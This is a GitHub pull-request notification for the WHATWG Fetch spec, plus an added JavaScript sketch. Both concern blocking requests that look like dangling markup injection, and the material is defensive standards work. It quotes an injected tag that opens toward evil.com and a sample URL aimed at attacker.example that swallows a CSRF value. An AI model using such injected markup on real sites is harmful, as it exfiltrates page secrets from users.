[whatwg/fetch] Block requests for suspected dangling markup. (#519)

As a mitigation against dangling markup attacks (which inject open tags like
`<img src='https://evil.com/` that eat up subsequent markup, and exfiltrate
content to an attacker), this patch tightens request processing to reject
those that contain a `<` character (consistent with an HTML element), _and_
had newline characters stripped during URL parsing (see whatwg/url#284).

It might be possible to block URLs whose newline characters were stripped entirely,
based on initial metrics. If those pan out the way I hope, we can tighten
this up in the future.
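As an added example (not the spec text or the PR's diff), a JavaScript sketch of the two-part test the PR describes, run against the WHATWG URL class; the sample inputs below are constructed, and the check is deliberately applied to the raw input because the parser discards the evidence.

```javascript
// Added example: a defender-side screen modelling the PR's two conditions.
// It assumes a WHATWG URL parser, which removes ASCII tab or newline from
// its input (whatwg/url#284) and percent-encodes "<" as "%3C", so both
// signals must be read from the raw, pre-parse string.
const ASCII_TAB_OR_NEWLINE = /[\t\n\r]/;

function isSuspectedDanglingMarkup(rawInput) {
  // Condition 1: characters the parser would strip are present.
  // Condition 2: a "<" consistent with an HTML element is present.
  return ASCII_TAB_OR_NEWLINE.test(rawInput) && rawInput.includes("<");
}

// What the parser produces from the same input, for comparison.
function parseForFetch(rawInput, base = "https://example.com/") {
  try {
    return new URL(rawInput, base).href;
  } catch {
    return null; // invalid URL: fetch fails before this check matters
  }
}

// Decide whether a request for rawInput should proceed.
function screenRequest(rawInput) {
  const href = parseForFetch(rawInput);
  if (href === null) return { allowed: false, reason: "invalid URL" };
  if (isSuspectedDanglingMarkup(rawInput)) {
    return { allowed: false, reason: "suspected dangling markup", href };
  }
  return { allowed: true, href };
}

// Constructed sample inputs (not from the PR). "dangling" is what an
// unterminated src=' attribute swallows up to the next quote: following
// markup, its line breaks, and page text.
const SAMPLES = {
  dangling: "https://attacker.example/\n  <input name=csrf value=\n  secret",
  newlineOnly: "https://example.com/a\nb", // stripped newline, no "<"
  ltOnly: "https://example.com/?q=<b>",   // "<" but nothing stripped
  clean: "https://example.com/path?x=1",
};

module.exports = { isSuspectedDanglingMarkup, parseForFetch, screenRequest, SAMPLES };
```

Only the `dangling` sample trips both conditions; the parsed `href` of that same input contains neither a newline nor a literal `<`, which is why the raw input has to be inspected.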

You can view, comment on, or merge this pull request online at:

  https://github.com/whatwg/fetch/pull/519

-- Commit Summary --

  * Block requests for suspected dangling markup.

-- File Changes --

    M fetch.bs (4)

-- Patch Links --

https://github.com/whatwg/fetch/pull/519.patch
https://github.com/whatwg/fetch/pull/519.diff

Received on Tuesday, 28 March 2017 13:13:10 UTC